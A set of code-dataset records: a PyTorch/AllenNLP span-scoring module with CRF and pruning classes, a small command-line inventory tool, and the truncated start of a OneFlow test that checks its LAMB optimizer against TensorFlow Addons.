allennlp.nn import util\r\n\r\n\r\nfrom pytorch_models.utils import one_hot, get_activation_fn\r\nfrom pytorch_models.utils import map_dict_builder\r\nfrom pytorch_models.utils import create_mask, map_dict_builder\r\nfrom pytorch_models.training import get_entity_loss\r\n\r\nclass SpanEmbedder(nn.Module):\r\n '''\r\n Create span embeddings\r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, 2)\r\n \r\n '''\r\n def __init__(self, input_dim, \\\r\n use_endpoint = True, \r\n use_attention = True,\r\n combination = \"x,y\",\r\n num_width_embeddings = None,\r\n span_width_embedding_dim = None,\r\n span_end_is_exclusive = True):\r\n \r\n super(SpanEmbedder, self).__init__()\r\n \r\n self.input_dim = int(input_dim)\r\n self.use_endpoint = bool(use_endpoint)\r\n self.use_attention = bool(use_attention)\r\n self.combination = str(combination)\r\n \r\n if span_width_embedding_dim is None:\r\n self.num_width_embeddings = None\r\n feat_size = 0\r\n else:\r\n self.num_width_embeddings = num_width_embeddings\r\n feat_size = span_width_embedding_dim\r\n \r\n self.span_width_embedding_dim = span_width_embedding_dim\r\n self.span_end_is_exclusive = bool(span_end_is_exclusive)\r\n\r\n # Endpoint extractor\r\n if self.use_endpoint:\r\n self._endpoint_extractor = EndpointSpanExtractor( \\\r\n input_dim = self.input_dim,\r\n combination = self.combination,\r\n num_width_embeddings = self.num_width_embeddings,\r\n span_width_embedding_dim = self.span_width_embedding_dim,\r\n bucket_widths = False)\r\n \r\n # Self-attentive span extractor\r\n if self.use_attention:\r\n self._attentive_extractor = \\\r\n SelfAttentiveSpanExtractor(input_dim=self.input_dim)\r\n\r\n # Dimensionality of span/Input dimension for FFNN\r\n a = len(self.combination.split(','))*int(self.use_endpoint)\r\n b = int(self.use_attention)\r\n self.output_dim = self.input_dim*(a + b) + feat_size\r\n\r\n # Placeholder for decrement in span end index\r\n self.span_offset = None\r\n\r\n\r\n def forward(self, sequence_tensor, sequence_mask, \r\n span_indices, span_mask):\r\n '''\r\n Parameters\r\n ----------\r\n sequence_tensor: sequence representation (batch_size, seq_len, embed_dim)\r\n sequence_mask: sequence mask (batch_size, seq_len)\r\n span_indices: tensor of span indices (batch_size, span_num, 2)\r\n span_mask: tensor of mask (batch_size, trig_num)\r\n \r\n 
Returns\r\n ------- \r\n span_embed: tensor of span embeddings (batch_size, span_num, output_dim) \r\n '''\r\n \r\n # If span end indices are exclusive, subtract 1\r\n if self.span_end_is_exclusive:\r\n \r\n # Initialize span offset (decrement end indices)\r\n if (self.span_offset is None) or \\\r\n (self.span_offset.shape != span_indices.shape):\r\n \r\n self.span_offset = torch.zeros_like(span_indices, \\\r\n requires_grad=False) \r\n self.span_offset[:,:,1] = - 1\r\n \r\n # Apply offset\r\n span_indices = span_indices + self.span_offset\r\n\r\n # Initialize output\r\n span_embed = []\r\n \r\n # Endpoint embedding\r\n if self.use_endpoint:\r\n span_embed.append(self._endpoint_extractor( \\\r\n sequence_tensor = sequence_tensor,\r\n span_indices = span_indices,\r\n sequence_mask = sequence_mask,\r\n span_indices_mask = span_mask))\r\n \r\n # Attentive embedding\r\n if self.use_attention:\r\n span_embed.append(self._attentive_extractor( \\\r\n sequence_tensor = sequence_tensor,\r\n span_indices = span_indices,\r\n sequence_mask = sequence_mask,\r\n span_indices_mask = span_mask))\r\n \r\n return torch.cat(span_embed, dim=2)\r\n\r\n\r\ndef span_labels_to_scores(labels, mask, num_tags, low_val, high_val, pruner):\r\n '''\r\n Use gold labels or CRF-predicted labels to generate label scores\r\n '''\r\n \r\n # Create binary, indicator labels\r\n binary_labels = (labels > 0).type(torch.FloatTensor)\r\n binary_labels = binary_labels.to(labels.device)\r\n\r\n # Number of elements to keep\r\n num_items_to_keep = max(int(binary_labels.sum(1).max()), 1)\r\n\r\n # Add dimension to binary labels so it can be treated as an embedding\r\n embeddings = binary_labels.unsqueeze(-1)\r\n\r\n # Get spans with positive labels\r\n _, mask_top, indices_top, prune_scores_top = \\\r\n pruner(embeddings, mask, num_items_to_keep)\r\n prune_scores_top = prune_scores_top.squeeze(-1) \r\n \r\n # Span scores\r\n label_scores = one_hot(labels, num_tags, \\\r\n low_val = low_val, \r\n high_val = high_val)\r\n\r\n # Top span scores\r\n label_scores_top = util.batched_index_select( \\\r\n target = label_scores, \r\n indices = indices_top)\r\n\r\n return (mask_top, indices_top, prune_scores_top, label_scores_top)\r\n\r\n\r\nclass PassThrough(nn.Module):\r\n '''\r\n Simple pass-through \r\n '''\r\n def __init__(self):\r\n super(PassThrough, self).__init__()\r\n \r\n def forward(self, x):\r\n return x\r\n \r\nclass SpanScorerGold(nn.Module):\r\n '''\r\n Span scorer using gold labels\r\n Convert labels to one hot encoding\r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, num_tags)\r\n \r\n '''\r\n def __init__(self, num_tags, low_val=-5, high_val=5):\r\n super(SpanScorerGold, self).__init__()\r\n \r\n self.num_tags = num_tags\r\n self.low_val = low_val\r\n self.high_val = high_val\r\n\r\n scorer = TimeDistributed(PassThrough())\r\n self._pruner = Pruner(scorer)\r\n\r\n\r\n def forward(self, labels, mask, embed):\r\n '''\r\n Parameters\r\n ----------\r\n span_labels: tensor of labels (batch_size, num_spans)\r\n \r\n Returns\r\n -------\r\n Pulled from AllenNLP GitHub:\r\n https://github.com/allenai/allennlp/blob/master/allennlp/modules/pruner.py\r\n \r\n embed_top : ``torch.FloatTensor``\r\n The representations of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, embedding_size).\r\n mask_top : ``torch.LongTensor``\r\n The corresponding mask for ``embed_top``.\r\n Has shape (batch_size, 
num_items_to_keep).\r\n indices_top : ``torch.IntTensor``\r\n The indices of the top-k scoring items into the original ``embeddings``\r\n tensor. This is returned because it can be useful to retain pointers to\r\n the original items, if each item is being scored by multiple distinct\r\n scorers, for instance. Has shape (batch_size, num_items_to_keep).\r\n top_item_scores : ``torch.FloatTensor``\r\n The values of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, 1).\r\n '''\r\n\r\n # Get scores from labels\r\n mask_top, indices_top, prune_scores_top, label_scores_top, \\\r\n = span_labels_to_scores( \\\r\n labels = labels, \r\n mask = mask, \r\n num_tags = self.num_tags, \r\n low_val = self.low_val, \r\n high_val = self.high_val,\r\n pruner = self._pruner)\r\n\r\n # Get top embeddings\r\n embed_top = util.batched_index_select(embed, indices_top)\r\n\r\n \r\n return (indices_top, embed_top, mask_top, prune_scores_top, label_scores_top)\r\n\r\n\r\nclass SpanScorerCRF(nn.Module):\r\n '''\r\n Span extractor\r\n '''\r\n def __init__(self, embed_size, label_map,\r\n low_val = -5, \r\n high_val = 5, \r\n constraints = None,\r\n incl_start_end = True,\r\n ):\r\n super(SpanScorerCRF, self).__init__()\r\n\r\n self.embed_size = embed_size\r\n self.label_map = label_map\r\n self.low_val = low_val\r\n self.high_val = high_val \r\n self.constraints = constraints\r\n self.incl_start_end = incl_start_end\r\n \r\n # Number of positive tags\r\n self.num_pos_tags = len(label_map[1:])\r\n \r\n # label_map to/from BIO (0th label is negative)\r\n self.mapping_BIO = label_map[:] + label_map[1:]\r\n \r\n # Dicts for mapping to/from label indices\r\n self.label_to_id, self.id_to_label = \\\r\n map_dict_builder(self.mapping_BIO)\r\n \r\n # Number of tags, including BI prefixes \r\n self.num_tags = len(self.mapping_BIO)\r\n \r\n # Linear projection layer\r\n self.projection = nn.Linear(embed_size, self.num_tags)\r\n \r\n # Create event-specific CRF\r\n self.crf = ConditionalRandomField( \\\r\n num_tags = self.num_tags, \r\n constraints = constraints,\r\n include_start_end_transitions = incl_start_end) \r\n\r\n # Dummy pruner\r\n scorer = TimeDistributed(PassThrough())\r\n self._pruner = Pruner(scorer)\r\n\r\n def forward(self, seq_tensor, seq_mask, span_map, span_mask, embed, spans, \\\r\n span_labels=None):\r\n '''\r\n Generate predictions\r\n '''\r\n # Dimensionality\r\n batch_size, max_seq_len, input_dim = tuple(seq_tensor.shape)\r\n\r\n # Project input tensor sequence to logits\r\n logits = self.projection(seq_tensor)\r\n \r\n # Best path\r\n best_paths = self.crf.viterbi_tags( \\\r\n logits = logits, \r\n mask = seq_mask)\r\n \r\n # Separate predictions and score\r\n seq_pred, score = zip(*best_paths)\r\n seq_pred = list(seq_pred)\r\n\r\n '''\r\n Process predictions\r\n '''\r\n # Get spans from sequence tags\r\n # Converts list of list of predicted label indices to\r\n # tensor of size (batch_size, num_spans)\r\n span_pred = self._seq_tags_to_spans(seq_pred, span_map)\r\n\r\n # Get scores from labels\r\n mask_top, indices_top, prune_scores_top, label_scores_top, \\\r\n = span_labels_to_scores( \\\r\n labels = span_pred, \r\n mask = span_mask, \r\n num_tags = self.num_tags, \r\n low_val = self.low_val, \r\n high_val = self.high_val,\r\n pruner = self._pruner)\r\n\r\n # Get top embeddings\r\n embed_top = util.batched_index_select(embed, indices_top)\r\n \r\n '''\r\n Calculate loss\r\n '''\r\n # No labels provided\r\n if span_labels is None:\r\n loss = None\r\n \r\n # Span labels provided (i.e. 
training)\r\n else: \r\n # Convert span representation to sequence tags \r\n seq_true = self._spans_to_seq_tags(span_labels, spans, \r\n max_seq_len)\r\n # Get loss (negative log likely)\r\n loss = -self.crf( \\\r\n inputs = logits, \r\n tags = seq_true, \r\n mask = seq_mask)\r\n\r\n \r\n \r\n return (embed_top, mask_top, indices_top, prune_scores_top, \r\n label_scores_top, loss)\r\n\r\n def _to_BIO(self, span_label, start, end):\r\n '''\r\n Convert span representation to BIO representation\r\n \r\n Parameters\r\n ----------\r\n span_label: scaler tensor, span label index\r\n start: scaler tensor, span start index\r\n end: scaler tensor, span end index\r\n \r\n '''\r\n \r\n # Span length\r\n n = end - start\r\n\r\n # Inside label \r\n I = span_label + self.num_pos_tags\r\n \r\n # Initialize to inside label\r\n seq_labels = torch.zeros(n).type(torch.LongTensor) \r\n seq_labels.fill_(I)\r\n \r\n # Begin label\r\n seq_labels[0] = span_label\r\n\r\n #REMOVE\r\n #seq_labels.fill_(span_label)\r\n\r\n return seq_labels \r\n\r\n def _from_BIO(self, seq_label):\r\n '''\r\n Convert BIO representation to span representation\r\n \r\n Parameters\r\n ----------\r\n seq_label: int, span label with BIO indices\r\n '''\r\n \r\n \r\n \r\n logging.warn(\"=\"*300)\r\n logging.warn(\"TODO replace this fucntion with pytorch_models.crf.tag_to_span_lab \")\r\n logging.warn(\"=\"*300)\r\n \r\n \r\n \r\n is_outside = 0\r\n is_begin = 0\r\n is_inside = 0\r\n \r\n # Convert sequence label to span label (i.e. convert BI)\r\n if seq_label > self.num_pos_tags:\r\n span_label = seq_label - self.num_pos_tags\r\n is_inside = 1\r\n elif seq_label > 0:\r\n span_label = seq_label\r\n is_begin = 1\r\n else:\r\n span_label = seq_label\r\n is_outside = 1\r\n \r\n return (span_label, is_outside, is_begin, is_inside)\r\n\r\n\r\n\r\n def _seq_tags_to_spans(self, seq_tags, span_map):\r\n '''\r\n Convert sequence tags to span labels\r\n \r\n Parameters\r\n ----------\r\n seq_tags: list of list of label indices\r\n i.e. 
list of sentences, where each sentence \r\n is a list of label indices\r\n \r\n Returns\r\n -------\r\n span_labels: tensor of shape (batch_size, num_spans)\r\n \r\n '''\r\n\r\n # Get inputs for tensor initialization\r\n batch_size = len(seq_tags)\r\n num_spans = len(span_map)\r\n\r\n # Initialize span labels to null label\r\n span_labels = torch.zeros(batch_size, num_spans).type( \\\r\n torch.LongTensor)\r\n \r\n # Loop on sequences\r\n for i_seq, seq in enumerate(seq_tags):\r\n \r\n # Loop on spans\r\n for lab, start, end in self._BIO_to_span(seq):\r\n \r\n # Token indices of current span\r\n idx = (start, end)\r\n \r\n # Span in map\r\n if idx in span_map:\r\n\r\n # Span index within tensor\r\n i_span = span_map[idx]\r\n \r\n # Update label tensor\r\n span_labels[i_seq, i_span] = lab\r\n \r\n # Span not in map\r\n else:\r\n pass\r\n logging.warn(\"span not in map:\\t{}\".format(idx))\r\n\r\n \r\n return span_labels\r\n\r\n\r\n def _spans_to_seq_tags(self, labels, spans, max_seq_len):\r\n '''\r\n Convert span labels to sequence labels\r\n \r\n \r\n Parameters\r\n ----------\r\n labels: tensor of label indices (batch_size, num_spans)\r\n spans: tensor of span indices (batch_size, num_spans, 2)\r\n max_seq_len: int, maximum sequence length\r\n num_pos_tags: int, number of non-negative labels\r\n \r\n Returns\r\n -------\r\n seq_tags: tensor with BIO label indices (batch_size, max_seq_len)\r\n '''\r\n \r\n \r\n # Label dimensionality\r\n batch_size, num_spans = tuple(labels.shape)\r\n \r\n # Initialize sequence tags to 0\r\n # (batch_size, max_seq_len)\r\n seq_tags = torch.zeros(batch_size, max_seq_len).type( \\\r\n torch.LongTensor)\r\n\r\n # Find indices of all nonnegative (0) labels\r\n # (n, d) \r\n # n = number of nonzero elements, \r\n # d = number of dimensions in labels (i.e. 2)\r\n non_neg_indices = torch.nonzero(labels)\r\n \r\n # Iterate over nonnegative labels\r\n for indices in non_neg_indices:\r\n\r\n # Sequence and span indices \r\n # indices_shape (2)\r\n i_seq = indices[0]\r\n i_span = indices[1]\r\n\r\n # Label \r\n # (1)\r\n lab = labels[i_seq, i_span]\r\n \r\n # Span start and stop indices\r\n # (2)\r\n span = spans[i_seq, i_span]\r\n start = span[0]\r\n end = span[1]\r\n\r\n # Update sequence tags with BI labels\r\n seq_tags[i_seq, start:end] = self._to_BIO(lab, start, end)\r\n \r\n return seq_tags\r\n\r\n\r\n def _BIO_to_span(self, seq):\r\n '''\r\n \r\n Finds spans in BIO sequence\r\n \r\n NOTE: start span index is inclusive, end span index is exclusive\r\n e.g. 
like Python lists\r\n \r\n '''\r\n\r\n\r\n \r\n logging.warn(\"=\"*300)\r\n logging.warn(\"TODO replace this fucntion with pytorch_models.crf.BIO_to_span\")\r\n logging.warn(\"=\"*300) \r\n\r\n spans = []\r\n begin_count = 0\r\n start = -1\r\n end = -1\r\n active_tag = None\r\n \r\n if not any(seq):\r\n return []\r\n\r\n for i_tok, x in enumerate(seq):\r\n \r\n \r\n # Convert current sequence tag label to span label\r\n tag, is_outside, is_begin, is_inside = self._from_BIO(x)\r\n \r\n # Outside label\r\n if is_outside:\r\n \r\n # The span has ended\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Not in a span\r\n active_tag = None\r\n \r\n # Span beginning\r\n elif is_begin:\r\n \r\n # The span has ended\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Update active tag\r\n active_tag = tag\r\n \r\n # Index of current span start\r\n start = i_tok\r\n end = i_tok + 1\r\n \r\n # Increment begin count\r\n begin_count += 1\r\n \r\n # Span inside and current tag matches active tag\r\n # e.g. well-formed span\r\n elif is_inside and (tag == active_tag):\r\n end += 1\r\n \r\n # Ill formed span\r\n elif is_inside and (tag != active_tag):\r\n\r\n # Capture end of valid span\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Not in a span\r\n active_tag = None\r\n \r\n else:\r\n raise ValueError(\"could not assign label\")\r\n \r\n # Last token might be part of a valid span\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Get span count \r\n span_count = len(spans)\r\n \r\n if True and (begin_count != span_count):\r\n msg = \\\r\n '''Count mismatch:\r\n seq = {}\r\n Begin count = {}\r\n span count = {}'''.format(seq, begin_count, span_count)\r\n logging.warn(msg)\r\n\r\n return spans\r\n\r\nclass BeamScorer(nn.Module):\r\n '''\r\n \r\n '''\r\n def __init__(self, scorer, agg_type):\r\n super(BeamScorer, self).__init__()\r\n self._scorer = scorer \r\n self.agg_type = agg_type\r\n\r\n def forward(self, candidates):\r\n \r\n # Apply scorer\r\n # [batch_size, n_spans, n_labels]\r\n scores = self._scorer(candidates)\r\n \r\n # Get overall score for non-null (positive) labels\r\n # Null labels represented by label index 0\r\n if self.agg_type == 'max':\r\n pos_scores, _ = scores[:,:,1:].max(dim=-1)\r\n elif self.agg_type == 'sum':\r\n pos_scores = scores[:,:,1:].sum(dim=-1)\r\n else:\r\n raise ValueError(\"incorrect agg_type: {}\".format(self.agg_type))\r\n \r\n # Add last dimension for compliance with Pruner API\r\n # [batch_size, n_spans, 1]\r\n return pos_scores.unsqueeze(-1)\r\n\r\nclass SpanScorerPrune(nn.Module):\r\n '''\r\n Span scorer \r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, num_tags)\r\n \r\n '''\r\n def __init__(self, input_dim, hidden_dim, num_tags, \\\r\n activation = 'relu',\r\n dropout = 0.0,\r\n spans_per_word = 2,\r\n agg_type = 'max',\r\n loss_reduction = 'sum'):\r\n super(SpanScorerPrune, self).__init__()\r\n \r\n\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.num_tags = num_tags\r\n \r\n self.activation = activation\r\n self.activation_fn = get_activation_fn(activation)\r\n\r\n self.dropout = dropout\r\n self.spans_per_word = spans_per_word\r\n self.agg_type = agg_type\r\n self.loss_reduction = loss_reduction\r\n \r\n \r\n self.num_layers = 1\r\n self.neg = -1e20\r\n \r\n '''\r\n Create 
classifier\r\n '''\r\n # Feedforward neural network for predicting span labels\r\n self._label_ffnn = FeedForward( \\\r\n input_dim = self.input_dim,\r\n num_layers = self.num_layers,\r\n hidden_dims = self.hidden_dim, \r\n activations = self.activation_fn,\r\n dropout = self.dropout)\r\n\r\n # Span classifier\r\n self._label_scorer = torch.nn.Sequential(\r\n TimeDistributed(self._label_ffnn),\r\n TimeDistributed(torch.nn.Linear(self.hidden_dim, self.num_tags)))\r\n\r\n '''\r\n Create pruner\r\n '''\r\n # Feedforward neural network for pruning score\r\n #self._pruning_ffnn = FeedForward( \\\r\n # input_dim = self.input_dim,\r\n # num_layers = self.num_layers,\r\n # hidden_dims = self.hidden_dim, \r\n # activations = self.activation,\r\n # dropout = self.dropout)\r\n\r\n # Pruning scoring function\r\n #self._pruning_scorer = torch.nn.Sequential(\r\n # TimeDistributed(self._pruning_ffnn),\r\n # TimeDistributed(torch.nn.Linear(self.hidden_dim, 1)))\r\n \r\n # Pruner\r\n self._pruning_scorer = BeamScorer(self._label_scorer, self.agg_type)\r\n self._pruner = Pruner(self._pruning_scorer) \r\n\r\n\r\n\r\n\r\n def forward(self, embed, mask, seq_lengths, span_labels=None):\r\n '''\r\n Parameters\r\n ----------\r\n span_labels: tensor of labels (batch_size, num_spans)\r\n \r\n Returns\r\n -------\r\n Pulled from AllenNLP GitHub:\r\n https://github.com/allenai/allennlp/blob/master/allennlp/modules/pruner.py\r\n \r\n embed_top : ``torch.FloatTensor``\r\n The representations of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, embedding_size).\r\n mask_top : ``torch.LongTensor``\r\n The corresponding mask for ``embed_top``.\r\n Has shape (batch_size, num_items_to_keep).\r\n indices_top : ``torch.IntTensor``\r\n The indices of the top-k scoring items into the original ``embeddings``\r\n tensor. This is returned because it can be useful to retain pointers to\r\n the original items, if each item is being scored by multiple distinct\r\n scorers, for instance. 
Has shape (batch_size, num_items_to_keep).\r\n top_item_scores : ``torch.FloatTensor``\r\n The values of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, 1).\r\n '''\r\n \r\n \r\n \r\n # Number of spans to keep by sentence\r\n # (batch_size)\r\n num_to_keep = seq_lengths*self.spans_per_word\r\n num_to_keep = torch.max(num_to_keep, torch.ones_like(num_to_keep))\r\n \r\n # Apply pruner to embeddings\r\n # embed_top (batch_size, max_num_to_keep, embed_dim)\r\n # mask_top, indices_top, prune_scores_top (batch_size, max_num_to_keep)\r\n # prune_scores_top (batch_size, max_num_to_keep, 1)\r\n embed_top, mask_top, indices_top, prune_scores_top = \\\r\n self._pruner(embed, mask, num_to_keep) \r\n prune_scores_top = prune_scores_top.squeeze(-1) \r\n\r\n # Compute label scores\r\n # (batch_size, num_spans, num_tags)\r\n label_scores = self._label_scorer(embed)\r\n\r\n # Give large negative scores to the masked-out values.\r\n label_scores = util.replace_masked_values( \\\r\n tensor = label_scores, \r\n mask = mask.unsqueeze(-1), \r\n replace_with = self.neg)\r\n\r\n # Top span scores\r\n label_scores_top = \\\r\n util.batched_index_select(label_scores, indices_top)\r\n\r\n if span_labels is None:\r\n loss = None\r\n else:\r\n loss = get_entity_loss( \\\r\n scores = label_scores, \r\n labels = span_labels, \r\n mask = mask,\r\n reduction = self.loss_reduction)\r\n\r\n \r\n return (embed_top, mask_top, indices_top, prune_scores_top, \r\n label_scores_top, loss)\r\n\r\n \r\n ", "sub_path": "code/pytorch_models/span_scoring.py", "file_name": "span_scoring.py", "file_ext": "py", "file_size_in_byte": 27319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "torch.nn.Module", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "allennlp.modules.span_extractors.EndpointSpanExtractor", "line_number": 63, "usage_type": "call"}, {"api_name": "allennlp.modules.span_extractors.SelfAttentiveSpanExtractor", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pytorch_models.utils.one_hot", "line_number": 156, "usage_type": "call"}, {"api_name": "allennlp.nn.util.batched_index_select", "line_number": 161, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 168, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 168, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "allennlp.modules.TimeDistributed", "line_number": 201, "usage_type": "call"}, {"api_name": "allennlp.modules.Pruner", "line_number": 202, "usage_type": "call"}, {"api_name": "allennlp.nn.util.batched_index_select", "line_number": 243, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 243, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 249, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 249, "usage_type": "name"}, {"api_name": "pytorch_models.utils.map_dict_builder", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 
282, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 282, "usage_type": "name"}, {"api_name": "allennlp.modules.conditional_random_field.ConditionalRandomField", "line_number": 285, "usage_type": "call"}, {"api_name": "allennlp.modules.TimeDistributed", "line_number": 291, "usage_type": "call"}, {"api_name": "allennlp.modules.Pruner", "line_number": 292, "usage_type": "call"}, {"api_name": "allennlp.nn.util.batched_index_select", "line_number": 333, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 333, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 377, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 377, "usage_type": "attribute"}, {"api_name": "logging.warn", "line_number": 399, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 400, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 401, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 446, "usage_type": "attribute"}, {"api_name": "logging.warn", "line_number": 469, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 498, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 499, "usage_type": "attribute"}, {"api_name": "torch.nonzero", "line_number": 505, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 543, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 544, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 545, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 620, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 624, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 624, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 652, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 652, "usage_type": "name"}, {"api_name": "pytorch_models.utils.get_activation_fn", "line_number": 681, "usage_type": "call"}, {"api_name": "allennlp.modules.FeedForward", "line_number": 696, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 704, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 704, "usage_type": "attribute"}, {"api_name": "allennlp.modules.TimeDistributed", "line_number": 705, "usage_type": "call"}, {"api_name": "allennlp.modules.TimeDistributed", "line_number": 706, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 706, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 706, "usage_type": "attribute"}, {"api_name": "allennlp.modules.Pruner", "line_number": 726, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 763, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 763, "usage_type": "call"}, {"api_name": "allennlp.nn.util.replace_masked_values", "line_number": 778, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 778, "usage_type": "name"}, {"api_name": "allennlp.nn.util.batched_index_select", "line_number": 785, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 785, "usage_type": "name"}, {"api_name": "pytorch_models.training.get_entity_loss", "line_number": 790, "usage_type": "call"}]} {"seq_id": "571255145", "text": "#!/usr/bin/env python3\n\nimport argparse\nimport os\n\nimport command_add\nimport command_show\nimport command_update\n\n\ndef create_parser():\n parser = argparse.ArgumentParser()\n subparsers = 
parser.add_subparsers(help=\"subcommands\")\n\n parser.add_argument(\"-i\", \"--inventory\", default=\"data/inventory.db\", help=\"path to inventory database\")\n parser.add_argument(\"-m\", \"--market\", default=\"data/market.json\", help=\"path to market database\")\n\n parser_add = subparsers.add_parser(\"add\", help=\"add an item to inventory\")\n parser_add.set_defaults(command=command_add.run)\n parser_add.add_argument(\"item\", nargs=\"?\")\n parser_add.add_argument(\"count\", nargs=\"?\", default=1, type=int)\n\n parser_show = subparsers.add_parser(\"show\", help=\"show full inventory\")\n parser_show.set_defaults(command=command_show.run)\n parser_show.add_argument(\"-d\", \"--ducats\", action=\"store_true\", help=\"sort by ducats/price value\")\n parser_show.add_argument(\"-p\", \"--plats\", action=\"store_true\", help=\"sort by price\")\n\n parser_update = subparsers.add_parser(\"update\")\n parser_update.set_defaults(command=command_update.run)\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = create_parser()\n args = parser.parse_args()\n os.makedirs(\"data\", exist_ok=True)\n if \"command\" in args:\n args.command(args)\n else:\n parser.print_help()\n", "sub_path": "wfih.py", "file_name": "wfih.py", "file_ext": "py", "file_size_in_byte": 1368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "command_add.run", "line_number": 19, "usage_type": "attribute"}, {"api_name": "command_show.run", "line_number": 24, "usage_type": "attribute"}, {"api_name": "command_update.run", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 37, "usage_type": "call"}]} {"seq_id": "637822495", "text": "\"\"\"\nCopyright 2020 The OneFlow Authors. 
All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport os\nimport unittest\nfrom collections import OrderedDict\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nimport test_global_storage\nfrom test_util import GenArgList\n\nimport oneflow.compatible.single_client.unittest\nfrom oneflow.compatible import single_client as flow\n\ngpus = tf.config.experimental.list_physical_devices(\"GPU\")\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n\ndef compare_with_tensorflow_addons_lamb(\n test_case,\n device_type,\n x_shape,\n beta1,\n beta2,\n epsilon,\n weight_decay,\n learning_rate,\n train_iters,\n):\n assert device_type in [\"gpu\", \"cpu\"]\n flow.clear_default_session()\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow.float32)\n\n @flow.global_function(type=\"train\", function_config=flow.FunctionConfig())\n def testLAMB(\n random_mask: flow.typing.Numpy.Placeholder(x_shape, dtype=flow.float32)\n ) -> flow.typing.Numpy:\n with flow.scope.placement(device_type, \"0:0-0\"):\n x = flow.get_variable(\n name=\"x\",\n shape=x_shape,\n dtype=flow.float32,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n loss = flow.math.reduce_mean(x + random_mask)\n flow.optimizer.LAMB(\n flow.optimizer.PiecewiseConstantScheduler([], [learning_rate]),\n beta1=beta1,\n beta2=beta2,\n epsilon=epsilon,\n weight_decay=weight_decay,\n ).minimize(loss)\n return x\n\n random_masks_seq = []\n for i in range(train_iters + 1):\n random_masks_seq.append(np.random.uniform(size=x_shape).astype(np.float32))\n x_list = []\n init_value = None\n for i in range(train_iters + 1):\n x = testLAMB(random_masks_seq[i])\n x_list.append(x)\n if i == 0:\n init_value = np.copy(x)\n var = tf.Variable(init_value)\n opt = tfa.optimizers.LAMB(\n learning_rate=learning_rate,\n 